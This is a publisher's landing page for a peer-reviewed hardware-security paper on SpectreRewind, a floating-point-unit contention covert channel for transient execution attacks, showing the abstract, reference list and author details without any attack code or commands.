Skip to main content
Springer Nature Link
Log in

A framework for leaking secrets to past instructions

  • Regular Paper
  • Published:
Journal of Cryptographic Engineering Aims and scope Submit manuscript

Abstract

Transient execution attacks use microarchitectural covert channels to leak secrets that should not have been accessible during logical program execution. Commonly used micro-architectural covert channels are those that leave lasting footprints in the micro-architectural state, for example, a cache state change, from which the secret is recovered after the transient execution is completed. In this paper, we present SpectreRewind, a new approach to create and exploit contention-based covert channels for transient execution attacks. In our approach, a covert channel is established by issuing the necessary instructions logically before the transiently executed victim code. Unlike prior contention-based covert channels, which require simultaneous multi-threading (SMT), SpectreRewind works on a single hardware thread and does not require SMT. We show that contention on the floating point division unit on commodity out-of-order processors can be used to create a high-performance (\(\sim \) 100 KB/s), low-noise covert channel for transient execution attacks instead of commonly used flush+reload-based cache covert channels. We also show that the proposed covert channel works in the JavaScript sandbox environment of a Chrome browser and can be used in a Meltdown attack.

This is a preview of subscription content, log in via an institution to check access.

Access this article

Log in via an institution

Subscribe and save

Springer+ Basic
$34.99 /Month
  • Get 10 units per month
  • Download Article/Chapter or eBook
  • 1 Unit = 1 Article or 1 Chapter
  • Cancel anytime
Subscribe now

Buy Now

Price excludes VAT (USA)
Tax calculation will be finalised during checkout.

Instant access to the full article PDF.

Institutional subscriptions

Fig. 1
Fig. 2
Fig. 3
Fig. 4
Fig. 5
Fig. 6
Fig. 7

Similar content being viewed by others

Notes

  1. Our PoC code is available at http://github.com/CSL-KU/SpectreRewind-POC.

  2. As defined in [1], latency refers to the clock cycles needed from the time the \(\upmu \)op is issued to the time the result become available to dependent \(\upmu \)ops, while throughput refers to the clock cycles needed from the time the \(\upmu \)op is issued until to the time the functional unit becomes available again.

  3. https://github.com/IAIK/meltdown.

References

  1. Abel, A., Reineke, J.: uops.info: characterizing latency, throughput, and port usage of instructions on intel microarchitectures. In: Architectural Support for Programming Languages and Operating Systems (ASPLOS), pp. 673–686. ACM, New York (2019)

  2. Aciicmez, O., Seifert, J.P.: Cheap hardware parallelism implies cheap security. In: Workshop on Fault Diagnosis and Tolerance in Cryptography (FDTC), pp. 80–91 (2007)

  3. ARM: Cortex-A72 Software Optimization Guide (2015). https://static.docs.arm.com/uan0016/a/cortex_a72_software_optimization_guide_external.pdf

  4. ARM: Cortex-A57 Software Optimization Guide (2016). https://static.docs.arm.com/uan0015/b/Cortex_A57_Software_Optimization_Guide_external.pdf

  5. Behnia, M., Sahu, P., Paccagnella, R., Yu, J., Zhao, Z., Zou, X., Unterluggauer, T., Torrellas, J., Rozas, C., Morrison, A., Mckeen, F., Liu, F., Gabor, R., Fletcher, C.W., Basak, A., Alameldeen, A.: Speculative interference attacks: breaking invisible speculation schemes. In: Architectural Support for Programming Languages and Operating Systems (ASPLOS) (2020)

  6. Bhattacharyya, A., Sandulescu, A., Neugschwandtner, M., Sorniotti, A., Falsafi, B., Payer, M., Kurmus, A.: Smotherspectre: exploiting speculative execution through port contention. In: ACM SIGSAC Conference on Computer and Communications Security (CCS), pp. 785–800 (2019)

  7. Boggs, D.D., Segelken, R., Cornaby, M., Fortino, N., Chaudhry, S., Khartikov, D., Mooley, A., Tuck, N., Vreugdenhil, G.: Memory type which is cacheable yet inaccessible by speculative instructions (2019). U.S. Patent App. 16,022,274

  8. Cache speculation side-channels. ARM White Paper (2018)

  9. Cabrera Aldaya, A., Bob Brumley, B., Ul Hassan, S., Pereida García, C., Tuveri, N.: Port contention for fun and profit. In: IEEE Symposium on Security and Privacy (SP) (2019)

  10. Canella, C., Bulck, J.V., Schwarz, M., Lipp, M., von Berg, B., Ortner, P., Piessens, F., Evtyushkin, D., Gruss, D.: A systematic evaluation of transient execution attacks and defenses. In: USENIX Security Symposium (2019)

  11. Fogh., A.: https://cyber.wtf/2016/09/27/covertshotgun/ (2016)

  12. Fustos, J., Bechtel, M., Yun, H.: Spectrerewind: leaking secrets to past instructions. In: Proceedings of the 4th ACM Workshop on Attacks and Solutions in Hardware Security, pp. 117–126 (2020)

  13. Fustos, J., Farshchi, F., Yun, H.: SpectreGuard: an efficient data-centric defense mechanism against spectre attacks. In: Design Automation Conference (DAC), pp. 61–1 (2019)

  14. Gonzalez, A., Korpan, B., Zhao, J., Younis, E., Asanović, K.: Replicating and mitigating spectre attacks on an open source risc-v microarchitecture. In: 3rd Workshop on Computer Architecture Research with RISC-V (CARRV) (2019)

  15. Gras, B., Giuffrida, C., Kurth, M., Bos, H., Razavi, K.: Absynthe: automatic blackbox side-channel synthesis on commodity microarchitectures. In: Network and Distributed Systems Security (NDSS) (2020)

  16. Horn, J.: speculative execution, variant 4: speculative store bypass (2018). https://bugs.chromium.org/p/project-zero/issues/detail?id=1528

  17. Intel: Intel Analysis of Speculative Execution Side Channels (Rev. 4.0). Tech. rep. (2018). https://software.intel.com/sites/default/files/managed/b9/f9/336983-Intel-Analysis-of-Speculative-Execution-Side-Channels-White-Paper.pdf

  18. Khasawneh, K.N., Koruyeh, E.M., Song, C., Evtyushkin, D., Ponomarev, D., Abu-Ghazaleh, N.: SafeSpec: banishing the spectre of a meltdown with leakage-free speculation. In: Design Automation Conference (DAC) (2019)

  19. Kiriansky, V., Waldspurger, C.: Speculative buffer overflows: attacks and defenses (2018). arXiv preprint arXiv:1807.03757

  20. Kocher, P., Horn, J., Fogh, A., Genkin, D., Gruss, D., Haas, W., Hamburg, M., Lipp, M., Mangard, S., Prescher, T., Schwarz, M., Yarom, Y.: Spectre attacks: exploiting speculative execution. In: IEEE Symposium on Security and Privacy (SP). IEEE Computer Society (2019)

  21. Koruyeh, E.M., Khasawneh, K.N., Song, C., Abu-Ghazaleh, N.: Spectre returns! Speculation attacks using the return stack buffer. In: USENIX Workshop on Offensive Technologies (WOOT) (2018)

  22. Lipp, M., Schwarz, M., Gruss, D., Prescher, T., Haas, W., Fogh, A., Horn, J., Mangard, S., Kocher, P., Genkin, D., Yarom, Y., Hamburg, M.: Meltdown: reading kernel memory from user space. In: USENIX Security (2018)

  23. Maisuradze, G., Rossow, C.: ret2spec: speculative execution using return stack buffers. In: ACM Conference on Computer and Communications Security (CCS), pp. 2109–2122. ACM (2018)

  24. Minkin, M., Moghimi, D., Lipp, M., Schwarz, M., Van Bulck, J., Genkin, D., Gruss, D., Sunar, B., Piessens, F., Yarom, Y.: Fallout: Reading kernel writes from user space. In: ACM SIGSAC conference on computer and communications security (2019)

  25. Moghimi, A., Wichelmann, J., Eisenbarth, T., Sunar, B.: Memjam: a false dependency attack against constant-time crypto implementations. Int. J. Parallel Program. (2019)

  26. Oberman, S.F.: Floating point division and square root algorithms and implementation in the amd-k7/sup tm/microprocessor. In: IEEE Symposium on Computer Arithmetic (Cat. No. 99CB36336), pp. 106–115. IEEE (1999)

  27. Saileshwar, G., Qureshi, M.K.: Cleanupspec: An “undo” approach to safe speculation. In: International Symposium on Microarchitecture (MICRO), pp. 73-86. ACM (2019)

  28. Schwarz, M., Lipp, M., Canella, C., Schilling, R., Kargl, F., Gruß, D.: Context: a generic approach for mitigating spectre. In: Network and Distributed System Security (NDSS) (2020)

  29. Schwarz, M., Lipp, M., Moghimi, D., Van Bulck, J., Stecklina, J., Prescher, T., Gruss, D.: ZombieLoad: cross-privilege-boundary data sampling. In: ACM Conference on Computer and Communications Security (CCS) (2019)

  30. Schwarz, M., Maurice, C., Gruss, D., Mangard, S.: Fantastic timers and where to find them: high-resolution microarchitectural attacks in javascript. In: Kiayias, A. (ed.) Financial Cryptography and Data Security, pp. 247–267. Springer, Cham (2017)

  31. Stecklina, J., Prescher, T.: Lazyfp: leaking FPU register state using microarchitectural side-channels (2018). arXiv preprint arXiv:1806.07480

  32. Sun, K., Branco, R., Hu, K.: A new memory type against speculative side channel attacks (2019). https://github.com/IntelSTORMteam/Papers

  33. Townley, D., Ponomarev, D.: Smt-cop: Defeating side-channel attacks on execution units in smt processors. In: 2019 28th International Conference on Parallel Architectures and Compilation Techniques (PACT) (2019)

  34. Tromer, E., Osvik, D.A., Shamir, A.: Efficient cache attacks on AES, and countermeasures. J. Cryptol. 23, 37–71 (2010)

    Article  MathSciNet  Google Scholar 

  35. Tullsen, D.M., Eggers, S.J., Levy, H.M.: Simultaneous multithreading: maximizing on-chip parallelism. In: International Symposium on Computer Architecture (ISCA), pp. 392–403. ACM (1995)

  36. Van Bulck, J., Minkin, M., Weisse, O., Genkin, D., Kasikci, B., Piessens, F., Silberstein, M., Wenisch, T.F., Yarom, Y., Strackx, R.: Foreshadow: Extracting the keys to the Intel SGX kingdom with transient out-of-order execution. In: USENIX Security Symposium. USENIX Association (2018)

  37. Van Bulck, J., Moghimi, D., Schwarz, M., Lipp, M., Minkin, M., Genkin, D., Yuval, Y., Sunar, B., Gruss, D., Piessens, F.: LVI: hijacking transient execution through microarchitectural load value injection. In: 41th IEEE Symposium on Security and Privacy (S &P’20) (2020)

  38. van Schaik, S., Milburn, A., Österlund, S., Frigo, P., Maisuradze, G., Razavi, K., Bos, H., Giuffrida, C.: RIDL: Rogue in-flight data load. In: S &P (2019)

  39. van Schaik, S., Minkin, M., Kwong, A., Genkin, D., Yarom, Y.: CacheOut: leaking data on Intel CPUs via cache evictions (2020). https://cacheoutattack.com/

  40. Wang, Z., Lee, R.B.: Covert and side channels due to processor architecture. In: Annual Computer Security Applications Conference (ACSAC), pp. 473–482 (2006)

  41. Weisse, O., Neal, I., Loughlin, K., Wenisch, T.F., Kasikci, B.: Nda: preventing speculative execution attacks at their source. In: Proceedings of the 52nd Annual IEEE/ACM International Symposium on Microarchitecture, pp. 572–586 (2019)

  42. Weisse, O., Van Bulck, J., Minkin, M., Genkin, D., Kasikci, B., Piessens, F., Silberstein, M., Strackx, R., Wenisch, T.F., Yarom, Y.: Foreshadow-NG: breaking the virtual memory abstraction with transient out-of-order execution. Technical Report (2018)

  43. Yan, M., Choi, J., Skarlatos, D., Morrison, A., Fletcher, C.W., Torrellas, J.: InvisiSpec: making speculative execution invisible in the cache hierarchy. In: International Symposium on Microarchitecture (MICRO) (2018)

  44. Yarom, Y., Falkner, K.: Flush+reload: a high resolution, low noise, l3 cache side-channel attack. In: 23rd USENIX Security Symposium (USENIX Security 14), pp. 719–732. USENIX Association, San Diego (2014)

  45. Yarom, Y., Genkin, D., Heninger, N.: Cachebleed: a timing attack on openssl constant-time RSA. J. Cryptogr. Eng. (2017)

  46. Yu, J., Yan, M., Khyzha, A., Morrison, A., Torrellas, J., Fletcher, C.W.: Speculative taint tracking (STT) a comprehensive protection for speculatively accessed data. In: International Symposium on Microarchitecture (MICRO), pp. 954–968 (2019)

Download references

Acknowledgements

This research is supported in part by NSF Grant CNS 1718880 and NSA Science of Security Initiative Contract no. #H98230-18-D-0009.

Author information

Authors and Affiliations

  1. School of Engineering, University of Kansas, Lawrence, KS, USA

    Jacob Fustos, Michael Bechtel & Heechul Yun

Authors
  1. Jacob Fustos
    View author publications

    You can also search for this author inPubMed Google Scholar

  2. Michael Bechtel
    View author publications

    You can also search for this author inPubMed Google Scholar

  3. Heechul Yun
    View author publications

    You can also search for this author inPubMed Google Scholar

Corresponding author

Correspondence to Heechul Yun.

Additional information

Publisher's Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Rights and permissions

Reprints and permissions

About this article

Check for updates. Verify currency and authenticity via CrossMark

Cite this article

Fustos, J., Bechtel, M. & Yun, H. A framework for leaking secrets to past instructions. J Cryptogr Eng 12, 461–473 (2022). https://doi.org/10.1007/s13389-022-00289-8

Download citation

  • Received:

  • Accepted:

  • Published:

  • Issue Date:

  • DOI: https://doi.org/10.1007/s13389-022-00289-8

Keywords